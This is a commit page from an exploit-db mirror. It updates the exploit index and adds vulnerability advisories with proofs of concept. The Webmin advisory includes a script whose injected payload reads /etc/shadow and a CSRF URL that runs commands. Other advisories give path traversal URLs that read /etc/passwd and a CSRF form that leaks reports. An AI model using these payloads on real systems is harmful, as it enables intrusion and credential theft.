bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-10-17

Browse source 
3 new exploits

Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)
Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)

Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation
Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)

Linux modutils 2.3.9 - modprobe Arbitrary Command Execution
Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution

Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow
Jan Hubicka Koules 1.4 - 'Svgalib' Buffer Overflow

Internet Security Systems 3.6 - ZWDeleteFile Function Arbitrary File Deletion
Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion

Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow
Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Buffer Overflow

Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection
Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection
Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution
Simplog 0.9.3.1 - comments.php SQL Injection
Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution
Simplog 0.9.3.1 - 'comments.php' SQL Injection

Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal
AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery
Webmin 1.850 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2017-10-17 05:01:30 +00:00
parent 51c5257c7f
commit 461226bd00
15 changed files with 365 additions and 78 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
files.csv
View file

@ -1756,7 +1756,7 @@ id,file,description,date,author,platform,type,port
15259,platforms/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos,0
15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos,0
15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0
15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos,0
15262,platforms/windows/dos/15262.txt,"Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos,0
15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0
15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -6067,7 +6067,7 @@ id,file,description,date,author,platform,type,port
2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0
2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0
2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local,0
2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0
2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)",2006-10-16,"Kevin Finisterre",osx,local,0
2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0
2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
@ -7726,10 +7726,10 @@ id,file,description,date,author,platform,type,port
20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0
40427,platforms/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0
20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local,0
20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 - modprobe Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0
20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0
20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - 'Svgalib' Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0
41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
@ -8419,7 +8419,7 @@ id,file,description,date,author,platform,type,port
28789,platforms/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",solaris,local,0
29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0
28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Privilege Escalation",2013-10-08,"Lorenzo Cantoni",linux,local,0
28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 - ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0
28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
@ -11841,7 +11841,7 @@ id,file,description,date,author,platform,type,port
19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0
19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0
19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0
19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Buffer Overflow",1998-07-17,anonymous,linux,remote,0
19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",linux,remote,0
19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0
@ -14355,7 +14355,7 @@ id,file,description,date,author,platform,type,port
30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",hardware,remote,0
30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0
30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0
30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0
30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0
30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0
30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0
30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0
@ -17541,8 +17541,8 @@ id,file,description,date,author,platform,type,port
2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - 'getsquad' SQL Injection",2006-10-15,Kiba,php,webapps,0
2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0
2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - 'GetRecord.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0
2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - comments.php SQL Injection",2006-10-16,w4ck1ng,php,webapps,0
2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - 'comments.php' SQL Injection",2006-10-16,w4ck1ng,php,webapps,0
2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
2576,platforms/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0
2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0
@ -38674,6 +38674,7 @@ id,file,description,date,author,platform,type,port
42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
42975,platforms/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",linux,webapps,0
42978,platforms/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",php,webapps,0
42979,platforms/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' Parameter SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps,0
42980,platforms/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",php,webapps,0
@ -38683,3 +38684,5 @@ id,file,description,date,author,platform,type,port
42985,platforms/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,php,webapps,0
42986,platforms/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0
42987,platforms/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting",2017-10-13,"Ishaq Mohammed",php,webapps,0
42988,platforms/php/webapps/42988.txt,"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery",2017-10-13,"Julien Ahrens",php,webapps,0
42989,platforms/cgi/webapps/42989.txt,"Webmin 1.850 - Multiple Vulnerabilities",2017-10-15,hyp3rlinx,cgi,webapps,0

Can't render this file because it is too large.

13
platforms/cgi/remote/20405.pl
View file

@ -1,10 +1,9 @@
source : http://www.securityfocus.com/bid/1951/info
DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
# source: http://www.securityfocus.com/bid/1951/info
#
# DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
#
#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To

134
platforms/cgi/webapps/42989.txt Executable file
View file

@ -0,0 +1,134 @@
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850
Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS,
file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from
the console or remotely. See the standard modules page for a list of all the functions built into Webmin.”
The vulnerabilities found are:
XSS vulnerability that leads to Remote Code Execution
CSRF Schedule arbitrary commands
Server Side Request Forgery
Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address these vulnerabilities.
For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html
Vulnerability details
XSS vulnerability that leads to Remote Code Execution
Under Webmin menu Others/File Manager there is option to download a file from a remote server Download from remote URL.
By setting up a malicious server we can wait for file download request then send a XSS payload that will lead to Remote Code Execution.
Webmin echo back the File Download request status which we can trigger the XSS vulnerability and bypass this Referrer check by setting the
domain=webmin-victim-ip.
Proof of Concept
import socket
#===================================================
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#-----------------------------------------------------------
#e.g.
#Download from remote URL
#http://x.x.x.x:10000/shell/index.cgi
#> whoami
#root
PORT=int(raw_input("[PORT]> ")) #port we listen on for file download requests
WEBMIN_IP=raw_input("[Webmin IP]> ") #victim
#Read /etc/shadow file
CMD=("/><script>document.domain='http://"+WEBMIN_IP+":10000/shell/index.cgi'</script>"+
"<form action='https://"+WEBMIN_IP+":10000/shell/index.cgi' method='POST' enctype='multipart/form-data'>"+
"<input type='hidden' name='cmd' value='cat /etc/shadow'><script>document.forms[0].submit()</script></form>")
s = socket.socket()
HOST = ''
s.bind((HOST, PORT))
s.listen(5)
print '\nwebmin file download 0day...'
while True:
conn, addr = s.accept()
conn.send(CMD+'\r\n')
print 'Connected!'
print s.recv(1024)
conn.close()
s.close()
CSRF Schedule arbitrary commands
User controlled input is not sufficiently sanitized, by sending GET request to create_job.cgi with the following parameter dir=/&cmd=ls
an attacker to execute arbitrary commands.
Proof of Concept
http://x.x.x.x:10000/at/create_job.cgi?user=root&day=31&month=7&year=2017&hour=2&min=00&dir=/&cmd=ls -lt&mail=0
Server Side Request Forgery
User controlled input is not sufficiently sanitized, by sending GET request to tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger
the vulnerability
Proof of Concept
http://x.x.x.x:10000/tunnel/link.cgi/http://VICTIM-IP:8000
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Would like to acknowledge Beyond Securitys SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3430
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

16
platforms/hp-ux/local/20396.sh
View file

@ -1,11 +1,11 @@
source : http://www.securityfocus.com/bid/1929/info
Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
This is a trivial root compromise.
# source: http://www.securityfocus.com/bid/1929/info
#
# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
#
# During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
#
# This is a trivial root compromise.
#
#!/bin/sh
#

23
platforms/linux/local/20402.sh
View file

@ -1,14 +1,15 @@
source : http://www.securityfocus.com/bid/1936/info
Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise.
The problem has to do with modprobe using popen() to execute the "echo" program argumented with user input. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters can be included in user input to execute other commands.
Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().
One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device is specified at the command-line that doesnt exist, request_module is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and exec's modprobe with them. Arbitrary commands included in the argument for module name (device name to ping) are then executed when popen() is called as root.
Successful exploitation of this will yield root access for the attacker.
# source: http://www.securityfocus.com/bid/1936/info
#
# Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise.
#
# The problem has to do with modprobe using popen() to execute the "echo" program argumented with user input. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters can be included in user input to execute other commands.
#
# Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().
#
# One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device is specified at the command-line that doesnt exist, request_module is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and exec's modprobe with them. Arbitrary commands included in the argument for module name (device name to ping) are then executed when popen() is called as root.
#
# Successful exploitation of this will yield root access for the attacker.
#
#!/bin/sh

18
platforms/linux/remote/30677.pl
View file

@ -1,13 +1,15 @@
source: http://www.securityfocus.com/bid/26095/info
#source: http://www.securityfocus.com/bid/26095/info
#
#Asterisk 'asterisk-addons' package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
#
#Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#
#This issue affects these versions:
#
#'asterisk-addons' prior to 1.2.8 when used with Asterisk Open Source 1.2.x
#'asterisk-addons' prior to 1.4.4 when used with Asterisk Open Source 1.4.x
Asterisk 'asterisk-addons' package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects these versions:
'asterisk-addons' prior to 1.2.8 when used with Asterisk Open Source 1.2.x
'asterisk-addons' prior to 1.4.4 when used with Asterisk Open Source 1.4.x
#!/usr/bin/perl

22
platforms/linux/webapps/42975.txt Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: Trend Micro Data Loss Prevention Virtual Appliance 5.2 Web Path Traversal
# Date: 10/11/2017
# Exploit Author: Leonardo Duarte
# Contact: http://twitter.com/etakdc
# Vendor Homepage: http://la.trendmicro.com/la/productos/data-loss-prevention/
# Version: 5.2
# Tested on: Debian 9
# Category: webapps
1. Description
A path traversal vulnerability that can be exploited to read files outside of the web root using encoded dot and slash characters
2. Proof of Concept
https://ip:8443/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFetc%C0%AFpasswd
https://ip:8443/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFbin%C0%AFash
https://ip/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFhome%C0%AFdgate%C0%AFiptables
Then the file will be visible

11
platforms/php/remote/34979.php
View file

@ -1,8 +1,9 @@
source: http://www.securityfocus.com/bid/44727/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
# source: http://www.securityfocus.com/bid/44727/info
#
# PHP is prone to an information-disclosure vulnerability.
#
# Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
#
<?php
$b = "bbbbbbbbbbb";

2
platforms/php/webapps/2574.php
View file

@ -62,7 +62,7 @@ $aname = explode( "><input type=text name=cname maxlength=64 value=\"",$data);
$bname = explode( "\">",$aname[1 ]);
$name = $bname[ 0];
$ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data);
$bhash = explode( "&lt;/textarea&gt;",$ahash[1 ]);
$bhash = explode( "</textarea>",$ahash[1 ]);
$hash = $bhash[ 0];
if(strlen($hash) != 32){

15
platforms/php/webapps/34035.sjs
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/40364/info
OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
# source: http://www.securityfocus.com/bid/40364/info
#
# OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
#
# Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
#
# OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #

15
platforms/php/webapps/36892.html
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/52224/info
Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected.
# source: http://www.securityfocus.com/bid/52224/info
#
# Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
#
# Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected.
#
<html>
<body onload="javascript:document.forms[0].submit()">

119
platforms/php/webapps/42988.txt Executable file
View file

@ -0,0 +1,119 @@
1. ADVISORY INFORMATION
=======================
Product: AlienVault USM
Vendor URL: https://www.alienvault.com
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2017-09-22
Date published: 2017-10-13
CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14956
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AlienVault USM 5.4.2 (current)
older versions may be affected too.
4. INTRODUCTION
===============
AlienVault Unified Security Management (USM) is a comprehensive approach to
security monitoring, delivered in a unified platform. The USM platform includes
five essential security capabilities that provide resource-constrained
organizations with all the security essentials needed for effective threat
detection, incident response, and compliance, in a single pane of glass.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
AlienVault USM v5.4.2 offers authenticated users the functionality to generate
and afterwards export generated compliance reports via the script located at
"/ossim/report/wizard_email.php". Besides offering an export via a local file
download, the script does also offer the possibility to send out any report via
email to a given address (either in PDF or XLSX format).
An exemplary request to send the pre-defined report
"PCI_DSS_3_2__Vulnerability_Details" to the email address "email () example com"
looks like the following:
https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email=email
() example com
The base64-encoded HTTP GET "name" parameter can be replaced with any other
of the approx. 240 pre-defined reports, that are shipped with AlienVault USM
since they do all have hardcoded identifiers, such as:
- Alarm_Report
- Ticket_Report
- Business_and_Compliance
- HIPAA_List_of_identified_ePHI_assets
- PCI_DSS_3_2_Database_Users_Added
- VulnerabilitiesReport
etc.
Since there is no anti-CSRF token protecting this functionality, it is
vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send
the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to
"email () example com" could look like the following:
<html>
<body>
<form action="https://example.com/ossim/report/wizard_email.php";>
<input type="hidden" name="extra&#95;data" value="1" />
<input type="hidden" name="name" value="UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw&#61;&#61;" />
<input type="hidden" name="format" value="email" />
<input type="hidden" name="pdf" value="true" />
<input type="hidden" name="email" value="email&#64;example&#46;com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability a user with rights to access the
compliance reports must be tricked into visiting an arbitrary website while
having an authenticated session in the application.
The vulnerability allows remote attackers to trigger a report generation and
send the report out to an arbitrary email address, which may lead to the
disclosure of very sensitive internal reporting information stored in AlienVault
USM through pre-defined reports such as:
- Alarms
- Assets Inventory
- Compliance Reports such as PCI DSS and HIPAA
- Raw Logs
- Security Events
- Security Operations
- Tickets
- User Activity
7. SOLUTION
===========
None.
8. REPORT TIMELINE
==================
2017-09-22: Discovery of the vulnerability
2017-09-22: Sent full vulnerability details to publicly listed security email
address
2016-10-01: MITRE assigns CVE-2017-14956
2017-10-03: No response from vendor, notified vendor again
2017-10-13: No response from vendor
2017-10-13: Public disclosure according to disclosure policy
9. REFERENCES
=============
https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-sensitive-compliance-information-via-csrf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956

4
platforms/unix/local/20410.cpp
View file

@ -1,8 +1,10 @@
source : http://www.securityfocus.com/bid/1967/info
/*
